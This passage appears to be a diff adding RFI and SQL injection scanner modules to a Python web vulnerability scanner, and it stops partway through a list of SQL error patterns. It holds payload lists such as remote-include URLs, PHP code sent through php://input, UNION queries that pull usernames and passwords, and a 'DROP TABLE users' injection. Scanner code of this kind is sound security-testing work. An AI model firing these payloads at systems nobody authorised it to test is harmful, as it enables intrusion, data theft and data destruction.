index 0000000..aae50cb
--- /dev/null
+++ b/xss_scanner/scanners/rfi_scanner.py
@@ -0,0 +1,351 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+RFI（远程文件包含）扫描器模块，负责扫描RFI漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class RFIScanner:
+    """RFI扫描器类，负责扫描远程文件包含漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化RFI扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 生成随机标记，用于检测RFI漏洞
+        self.rfi_mark = 'RFI_' + self._generate_random_string(8)
+        
+        # RFI检测Payload
+        # 注意：在实际使用中，这些应该指向攻击者控制的服务器
+        # 出于安全考虑，这里使用的是公共可访问的测试服务
+        self.payloads = [
+            # 远程文件包含的基本测试
+            "http://example.com/rfi_test.txt",
+            "https://example.com/rfi_test.php",
+            "http://test.example.com/shell.txt",
+            
+            # 使用不同协议（实际使用中应指向攻击者控制的服务器）
+            "ftp://example.com/rfi_test.php",
+            "https://raw.githubusercontent.com/some-repo/test/master/info.php",
+            
+            # 使用端口和认证
+            "http://user:password@example.com:8080/rfi_test.php",
+            
+            # IP地址形式
+            "http://127.0.0.1/rfi_test.php",
+            "http://192.168.0.1/rfi_test.php",
+            "http://[::1]/rfi_test.php",
+            
+            # 使用单词编码
+            "http://%65%78%61%6d%70%6c%65.com/rfi_test.php",
+            
+            # URL编码绕过
+            "http%3A%2F%2Fexample.com%2Frfi_test.php",
+            
+            # 双重URL编码
+            "http%253A%252F%252Fexample.com%252Frfi_test.php",
+            
+            # 使用空字节截断（适用于某些PHP版本）
+            "http://example.com/rfi_test.php%00",
+            "http://example.com/rfi_test.php\0",
+            
+            # 使用注释截断
+            "http://example.com/rfi_test.php#",
+            "http://example.com/rfi_test.php?",
+            
+            # 使用双斜杠
+            "http://example.com//rfi_test.php",
+            
+            # 使用数据URI（PHP支持）
+            f"data://text/plain;base64,{self._encode_base64(f'<?php echo "{self.rfi_mark}"; ?>')}",
+            
+            # 使用PHP包装器
+            "php://input", 
+            
+            # 使用file://URL（仅当服务器和攻击者在同一台机器上）
+            "file:///var/www/html/rfi_test.php"
+        ]
+        
+        # 可能的RFI成功特征
+        self.success_patterns = [
+            re.escape(self.rfi_mark),  # 我们的标记
+            "root:.*:0:0:",  # 如果包含远程服务器系统文件
+            "\\<\\?php",     # PHP代码
+            "phpinfo\\(\\)", # PHP信息
+            "PHP Version",   # PHP版本信息
+            "www-data",      # Web服务用户
+            "HTTP_USER_AGENT", # PHP环境变量
+            "REMOTE_ADDR",   # PHP环境变量
+            "SERVER_ADDR",   # PHP环境变量
+            "DOCUMENT_ROOT", # PHP环境变量
+            "PATH_TRANSLATED", # PHP环境变量
+            "Warning: assert" # PHP警告
+        ]
+        
+        # PHP错误模式，可能表明存在漏洞但无法被成功利用
+        self.php_error_patterns = [
+            "failed to open stream: HTTP request failed",
+            "failed to open stream: Connection refused",
+            "failed to open stream: No such file or directory",
+            "Deprecated: Directive 'allow_url_include' is deprecated",
+            "Warning: include\\(", 
+            "Warning: remote_file_inclusion",
+            "allow_url_fopen must be enabled",
+            "allow_url_include must be enabled",
+            "Warning: include_once\\(",
+            "Failed to include '"
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的RFI漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在RFI的字段名称
+        rfi_prone_fields = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include',
+            'inc', 'locate', 'show', 'site', 'view', 'content'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in rfi_prone_fields):
+            return None
+            
+        logger.debug(f"扫描RFI: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测RFI漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 如果是data://或php://输入，需要准备额外的数据
+            post_data = None
+            if payload == "php://input":
+                post_data = f"<?php echo '{self.rfi_mark}'; ?>"
+                
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    if post_data:
+                        # 对于php://input，需要直接发送PHP代码
+                        response = self.http_client.post(action_url, data=form_data, 
+                                                         headers={"Content-Type": "application/x-www-form-urlencoded"}, 
+                                                         body=post_data)
+                    else:
+                        response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_rfi_success(response.text):
+                    return {
+                        'type': 'RFI',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现远程文件包含(RFI)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在RFI漏洞，可以执行远程服务器上的代码",
+                        'recommendation': "禁用PHP的allow_url_fopen和allow_url_include选项，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描RFI时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的RFI漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在RFI的参数名称
+        rfi_prone_params = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include',
+            'inc', 'locate', 'show', 'site', 'view', 'content'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in rfi_prone_params):
+            return None
+            
+        logger.debug(f"扫描RFI参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测RFI漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            # 如果是data://或php://输入，需要准备额外的数据
+            post_data = None
+            if payload == "php://input":
+                post_data = f"<?php echo '{self.rfi_mark}'; ?>"
+                
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                if post_data:
+                    # 对于php://input，需要直接发送PHP代码
+                    response = self.http_client.request("POST", test_url, 
+                                                       headers={"Content-Type": "application/x-www-form-urlencoded"}, 
+                                                       data=post_data)
+                else:
+                    response = self.http_client.get(test_url)
+                
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_rfi_success(response.text):
+                    return {
+                        'type': 'RFI',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现远程文件包含(RFI)漏洞",
+                        'details': f"URL参数{param}存在RFI漏洞，可以执行远程服务器上的代码",
+                        'recommendation': "禁用PHP的allow_url_fopen和allow_url_include选项，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描RFI参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_rfi_success(self, content):
+        """
+        检查响应内容中是否包含RFI成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含RFI成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查成功特征
+        for pattern in self.success_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        # 检查PHP错误信息特征，但需要进一步验证
+        for pattern in self.php_error_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                # 如果响应中包含某些服务器信息，可能表明漏洞可以被进一步利用
+                if re.search("/(var|etc|usr|opt|home)/", content):
+                    return True
+                if re.search("([A-Za-z]:\\\\|System32|Program Files)", content):
+                    return True
+                    
+        return False
+    
+    def _generate_random_string(self, length=8):
+        """
+        生成随机字符串
+        
+        Args:
+            length: 字符串长度
+            
+        Returns:
+            str: 随机字符串
+        """
+        chars = string.ascii_letters + string.digits
+        return ''.join(random.choice(chars) for _ in range(length))
+    
+    def _encode_base64(self, text):
+        """
+        Base64编码
+        
+        Args:
+            text: 要编码的文本
+            
+        Returns:
+            str: Base64编码后的字符串
+        """
+        import base64
+        return base64.b64encode(text.encode()).decode()
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/sql_injection_scanner.py b/xss_scanner/scanners/sql_injection_scanner.py
new file mode 100644
index 0000000..8a03425
--- /dev/null
+++ b/xss_scanner/scanners/sql_injection_scanner.py
@@ -0,0 +1,664 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SQL注入扫描器模块，负责扫描SQL注入漏洞
+"""
+
+import re
+import logging
+import time
+import random
+from difflib import SequenceMatcher
+from urllib.parse import urlparse, urlencode, parse_qsl
+
+logger = logging.getLogger('xss_scanner')
+
+class SQLInjectionScanner:
+    """SQL注入扫描器类，负责扫描SQL注入漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SQL注入扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 基本的SQL注入Payload
+        self.payloads = {
+            'error_based': [
+                "'",
+                "\"",
+                "')",
+                "'))",
+                "\")",
+                "\"))",
+                "';",
+                "\";",
+                "')) OR 1=1--",
+                "')); OR 1=1--",
+                "')) OR '1'='1'--",
+                "')) OR '1'='1'#",
+                "' OR '1'='1'--",
+                "' OR '1'='1' --",
+                "' OR '1'='1'#",
+                "' OR '1'='1' #",
+                "' OR 1=1--",
+                "' OR 1=1 --",
+                "\" OR 1=1--",
+                "\" OR 1=1 --"
+            ],
+            'time_based': [
+                "' OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "') OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "\" OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "\") OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "';WAITFOR DELAY '0:0:3'--",
+                "');WAITFOR DELAY '0:0:3'--",
+                "\";WAITFOR DELAY '0:0:3'--",
+                "\");WAITFOR DELAY '0:0:3'--",
+                "' OR pg_sleep(3)--",
+                "') OR pg_sleep(3)--",
+                "' AND (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "') AND (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "\" AND (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "\") AND (SELECT * FROM (SELECT(SLEEP(3)))a)--"
+            ],
+            'union_based': [
+                "' UNION SELECT 1,2,3,4--",
+                "' UNION SELECT 1,2,3,4,5--",
+                "' UNION SELECT NULL,NULL,NULL,NULL--",
+                "' UNION SELECT username,password,3,4 FROM users--",
+                "' UNION ALL SELECT 1,2,3,4--",
+                "' UNION ALL SELECT 1,2,3,4,5--",
+                "' UNION ALL SELECT NULL,NULL,NULL,NULL--",
+                "' UNION ALL SELECT username,password,3,4 FROM users--"
+            ],
+            'boolean_based': [
+                "' AND 1=1--",
+                "' AND 1=2--",
+                "' OR 1=1--",
+                "' OR 1=2--",
+                "') AND 1=1--",
+                "') AND 1=2--",
+                "') OR 1=1--",
+                "') OR 1=2--"
+            ],
+            # 专门针对Email字段的SQL注入有效载荷
+            'email_specific': [
+                "test@test.com' OR 1=1--",
+                "test@test.com') OR 1=1--",
+                "test@test.com')) OR 1=1--",
+                "test@test.com'))) OR 1=1--",
+                "test@test.com'; DROP TABLE users--",
+                "test@test.com')) UNION SELECT username,password,3,4 FROM users--",
+                "test'+'@example.com",
+                "test@example.com' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))test)--",
+                "test@example.com' OR EXISTS(SELECT * FROM users)--",
+                "test@example.com' AND EXISTS(SELECT * FROM users WHERE username='admin')--",
+                "test@example.com' UNION SELECT username,password FROM users--",
+                "admin'--@example.com",
+                "' UNION SELECT @@version,2#@example.com",
+                "admin'/**/OR/**/1=1#@example.com",
+                "test@example.com' AND 'x'='x",
+                "test@example.com' AND SLEEP(3)#",
+                "'; DECLARE @v nvarchar(max), @q nvarchar(max); SET @v = 'admin@example.com'; SET @q = 'SELECT * FROM Users WHERE email='''+@v+''''; EXEC(@q)--@test.com"
+            ]
+        }
+        
+        # SQL错误特征
+        self.sql_errors = [
+            "SQL syntax.*?MySQL", "Warning.*?mysqli", "MySQLSyntaxErrorException",
+            "valid MySQL result", "check the manual that corresponds to your (MySQL|MariaDB) server version",
+            "MySqlClient\\.", "com\\.mysql\\.jdbc", "Zend_Db_(Adapter|Statement)_Mysqli_Exception",
+            "SQLSTATE\\[\\d+\\]: Syntax error or access violation", "Uncaught mysqli_sql_exception",
+            
+            "ORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*?Driver", "Warning.*?oci_.*", "OracleConnection",
+            "quoted string not properly terminated", "ORA-00936: missing expression",
+            
+            "Microsoft SQL Server", "MSSQL.*?Driver", "MSSQL.*?Exception", "Msg \\d+, Level \\d+, State \\d+",
+            "Unclosed quotation mark after the character string", "Incorrect syntax near",
+            
+            "PostgreSQL.*?ERROR", "Warning.*?Pg_.*", "valid PostgreSQL result", "PgSqlException",
+            "PSQLException", "org\\.postgresql\\.util\\.PSQLException",
+            
+            "CLI Driver.*?DB2", "DB2 SQL error", "db2_\\w+\\(",
+            
+            "SQLite3::query", "SQLite3Result", "SQLitException",
+            
+            "Warning.*?sqlite_.*?", "Warning.*?PDO::.*?",
+            
+            "HY000", "Dynamic SQL Error", "System\\.Data\\.SqlClient\\.SqlException", 
+            "Exception.*?Sybase.*?", "Sybase message", "Sybase.*?Server message"
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的SQL注入漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描SQL注入: {field.get('name')} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 构建基准表单数据，用于比较
+        base_form_data = {}
+        for f in form.get('fields', []):
+            if f.get('name'):
+                # 对于目标字段使用无害值
+                if f['name'] == field['name']:
+                    # 根据字段类型选择适当的测试值
+                    if field.get('type') == 'email' or 'email' in field.get('name', '').lower():
+                        base_form_data[f['name']] = 'test@example.com'
+                    else:
+                        base_form_data[f['name']] = 'test123'
+                else:
+                    base_form_data[f['name']] = f.get('value', '')
+        
+        # 发送基准请求
+        if method == 'POST':
+            base_response = self.http_client.post(action_url, data=base_form_data)
+        else:
+            base_response = self.http_client.get(action_url, params=base_form_data)
+            
+        if not base_response:
+            return None
+            
+        # 检查字段是否为email类型或名称包含email
+        is_email_field = field.get('type') == 'email' or 'email' in field.get('name', '').lower()
+        
+        # 测试基于错误的SQL注入
+        payloads_to_test = self.payloads['error_based']
+        
+        # 如果是email字段，优先使用email特定的有效载荷
+        if is_email_field:
+            logger.info(f"检测到Email字段: {field.get('name')}，使用特定的SQL注入测试")
+            payloads_to_test = self.payloads['email_specific'] + payloads_to_test
+            
+        for payload in payloads_to_test:
+            # 构建注入表单数据
+            inject_form_data = base_form_data.copy()
+            inject_form_data[field['name']] = payload
+            
+            # 发送注入请求
+            if method == 'POST':
+                inject_response = self.http_client.post(action_url, data=inject_form_data)
+            else:
+                inject_response = self.http_client.get(action_url, params=inject_form_data)
+                
+            if not inject_response:
+                continue
+                
+            # 检查是否有SQL错误
+            if self._check_sql_errors(inject_response.text):
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Error-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于错误的SQL注入漏洞",
+                    'details': {
+                        "漏洞位置": f"表单提交到{action_url}的{field['name']}字段",
+                        "漏洞类型": "基于错误的SQL注入",
+                        "有效载荷": payload,
+                        "风险": "攻击者可能能够执行任意SQL查询，访问或修改数据库内容"
+                    },
+                    'recommendation': "使用参数化查询或预处理语句，对用户输入进行严格过滤，限制数据库账户权限"
+                }
+        
+        # 测试基于时间的SQL注入
+        for payload in self.payloads['time_based']:
+            # 构建注入表单数据
+            inject_form_data = base_form_data.copy()
+            inject_form_data[field['name']] = payload
+            
+            # 记录开始时间
+            start_time = time.time()
+            
+            # 发送注入请求
+            if method == 'POST':
+                inject_response = self.http_client.post(action_url, data=inject_form_data)
+            else:
+                inject_response = self.http_client.get(action_url, params=inject_form_data)
+                
+            # 计算响应时间
+            response_time = time.time() - start_time
+            
+            # 如果响应时间超过了预期的延迟时间（考虑网络延迟），则可能存在时间盲注
+            if response_time > 2.5:  # 考虑到网络延迟，使用略小于3秒的阈值
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Time-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于时间的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在基于时间的SQL注入漏洞，响应时间为{response_time:.2f}秒",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+        
+        # 测试基于布尔的SQL注入
+        boolean_results = {}
+        for payload in self.payloads['boolean_based']:
+            # 构建注入表单数据
+            inject_form_data = base_form_data.copy()
+            inject_form_data[field['name']] = payload
+            
+            # 发送注入请求
+            if method == 'POST':
+                inject_response = self.http_client.post(action_url, data=inject_form_data)
+            else:
+                inject_response = self.http_client.get(action_url, params=inject_form_data)
+                
+            if not inject_response:
+                continue
+                
+            # 记录响应内容和长度
+            response_content = inject_response.text if hasattr(inject_response, 'text') else ''
+            response_length = len(response_content)
+            
+            # 提取payload的逻辑部分，如1=1或1=2
+            if "1=1" in payload or "'1'='1'" in payload or "\"1\"=\"1\"" in payload:
+                logic_type = 'TRUE'
+            else:
+                logic_type = 'FALSE'
+                
+            # 记录结果
+            if logic_type not in boolean_results:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'TRUE' and response_length > boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'FALSE' and response_length < boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+        
+        # 如果收集到了两种逻辑的结果，比较它们
+        if 'TRUE' in boolean_results and 'FALSE' in boolean_results:
+            true_length = boolean_results['TRUE']['length']
+            false_length = boolean_results['FALSE']['length']
+            
+            # 如果长度差异明显，则可能存在布尔盲注
+            if abs(true_length - false_length) > 10:
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在布尔盲注漏洞，TRUE条件下响应长度为{true_length}，FALSE条件下响应长度为{false_length}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+            
+            # 如果内容差异明显，则可能存在布尔盲注
+            true_content = boolean_results['TRUE']['content']
+            false_content = boolean_results['FALSE']['content']
+            similarity = SequenceMatcher(None, true_content, false_content).ratio()
+            
+            if similarity < 0.9:  # 相似度低于90%
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在布尔盲注漏洞，TRUE和FALSE条件下的响应内容相似度为{similarity:.2f}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的SQL注入漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        logger.debug(f"扫描SQL注入参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 解析查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不在查询字符串中，则跳过
+        if param not in query_params:
+            return None
+            
+        # 获取参数原始值
+        original_value = query_params[param]
+        
+        # 检查参数是否可能是email
+        is_email_param = 'email' in param.lower() or (original_value and '@' in original_value and '.' in original_value.split('@')[1])
+        
+        # 构建基准URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 发送基准请求
+        base_response = self.http_client.get(url)
+        
+        if not base_response:
+            return None
+            
+        # 测试基于错误的SQL注入
+        payloads_to_test = self.payloads['error_based']
+        
+        # 如果是email参数，使用email特定的有效载荷
+        if is_email_param:
+            logger.info(f"检测到Email参数: {param}，使用特定的SQL注入测试")
+            payloads_to_test = self.payloads['email_specific'] + payloads_to_test
+        
+        for payload in payloads_to_test:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建注入URL
+            inject_url = f"{base_url}?{urlencode(inject_params)}"
+            
+            # 发送注入请求
+            inject_response = self.http_client.get(inject_url)
+            
+            if not inject_response:
+                continue
+                
+            # 检查是否有SQL错误
+            if self._check_sql_errors(inject_response.text):
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Error-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于错误的SQL注入漏洞",
+                    'details': {
+                        "漏洞位置": f"URL参数{param}",
+                        "漏洞类型": "基于错误的SQL注入",
+                        "有效载荷": payload,
+                        "风险": "攻击者可能能够执行任意SQL查询，访问或修改数据库内容"
+                    },
+                    'recommendation': "使用参数化查询或预处理语句，对用户输入进行严格过滤，限制数据库账户权限"
+                }
+        
+        # 测试基于时间的SQL注入
+        for payload in self.payloads['time_based']:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建注入URL
+            inject_url = f"{base_url}?{urlencode(inject_params)}"
+            
+            # 记录开始时间
+            start_time = time.time()
+            
+            # 发送注入请求
+            inject_response = self.http_client.get(inject_url)
+            
+            # 计算响应时间
+            response_time = time.time() - start_time
+            
+            # 如果响应时间超过了预期的延迟时间（考虑网络延迟），则可能存在时间盲注
+            if response_time > 2.5:  # 考虑到网络延迟，使用略小于3秒的阈值
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Time-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于时间的SQL注入漏洞",
+                    'details': f"URL参数{param}存在基于时间的SQL注入漏洞，响应时间为{response_time:.2f}秒",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+        
+        # 测试基于布尔的SQL注入
+        boolean_results = {}
+        for payload in self.payloads['boolean_based']:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建注入URL
+            inject_url = f"{base_url}?{urlencode(inject_params)}"
+            
+            # 发送注入请求
+            inject_response = self.http_client.get(inject_url)
+            
+            if not inject_response:
+                continue
+                
+            # 记录响应内容和长度
+            response_content = inject_response.text if hasattr(inject_response, 'text') else ''
+            response_length = len(response_content)
+            
+            # 提取payload的逻辑部分，如1=1或1=2
+            if "1=1" in payload or "'1'='1'" in payload or "\"1\"=\"1\"" in payload:
+                logic_type = 'TRUE'
+            else:
+                logic_type = 'FALSE'
+                
+            # 记录结果
+            if logic_type not in boolean_results:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'TRUE' and response_length > boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'FALSE' and response_length < boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+        
+        # 如果收集到了两种逻辑的结果，比较它们
+        if 'TRUE' in boolean_results and 'FALSE' in boolean_results:
+            true_length = boolean_results['TRUE']['length']
+            false_length = boolean_results['FALSE']['length']
+            
+            # 如果长度差异明显，则可能存在布尔盲注
+            if abs(true_length - false_length) > 10:
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"URL参数{param}存在布尔盲注漏洞，TRUE条件下响应长度为{true_length}，FALSE条件下响应长度为{false_length}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+            
+            # 如果内容差异明显，则可能存在布尔盲注
+            true_content = boolean_results['TRUE']['content']
+            false_content = boolean_results['FALSE']['content']
+            similarity = SequenceMatcher(None, true_content, false_content).ratio()
+            
+            if similarity < 0.9:  # 相似度低于90%
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"URL参数{param}存在布尔盲注漏洞，TRUE和FALSE条件下的响应内容相似度为{similarity:.2f}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+                
+        return None
+    
+    def _check_sql_errors(self, content):
+        """
+        检查响应内容是否包含SQL错误
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含SQL错误
+        """
+        error_patterns = [
+            # MySQL
+            "You have an error in your SQL syntax",
+            "Warning: mysql_",
+            "MySQL Error",
+            "MySQL ODBC",
+            "MySQL Driver",
+            "mysqli_",
+            "mysqli.query",
+            "Unclosed quotation mark after the character string",
+            "SQL syntax.*?MySQL",
+            "Warning.*?mysqli",
+            
+            # PostgreSQL
+            "PostgreSQL.*?ERROR",
+            "Warning.*?\\Wpg_",
+            "valid PostgreSQL result",
+            "PostgreSQL query failed",
+            "org.postgresql.util.PSQLException",
+            
+            # Microsoft SQL Server
+            "Microsoft SQL Server",
+            "ODBC SQL Server Driver",
+            "ODBC Driver.*?SQL Server",
+            "SQLServer JDBC Driver",
+            "SqlException",
+            "Unclosed quotation mark after the character string",
+            "mssql_query()",
+            "System\\.Data\\.SqlClient\\.",
+            "Exception.*?\\WSystem.Data.SqlClient.",
+            "Exception.*?\\WServer.SqlException",
+            
+            # Oracle
+            "ORA-[0-9][0-9][0-9][0-9]",
+            "Oracle error",
+            "Oracle.*?Driver",
+            "Warning.*?\\Woci_",
+            "Oracle.*?Database",
+            
+            # SQLite
+            "SQLite/JDBCDriver",
+            "SQLite\\.Exception",
+            "System\\.Data\\.SQLite\\.SQLiteException",
+            "Warning.*?sqlite_",
+            
+            # 通用模式
+            "SQL syntax.*?error",
+            "Incorrect syntax near",
+            "Syntax error.*?in query expression",
+            "Unexpected end of command in statement",
+            "Unexpected token.*?in statement",
+            "SQL ERROR",
+            "SQL Error",
+            "SQLSTATE",
+            "\\[SQL Server\\]",
+            "ODBC Driver",
+            "syntax error",
+            "Division by zero",
+            "Unable to connect to database",
+            "Database error",
+            "DB Error",
+            "query failed",
+            "Unable to execute query",
+            "Invalid SQL",
+            "Database connection error",
+            "SQL command.*?not properly ended",
+            "Malformed query",
+            "Object reference not set to an instance",
+            "DatabaseException",
+            "DBD::mysql::st",
+            "SQL STATE",
+            "JDBC Driver",
+            "java.sql.SQLException",
+            "JSQLConnect",
+            "JET Database Engine",
+            "Access Database Engine",
+            "Driver.*?SQL",
+            "Invalid column name",
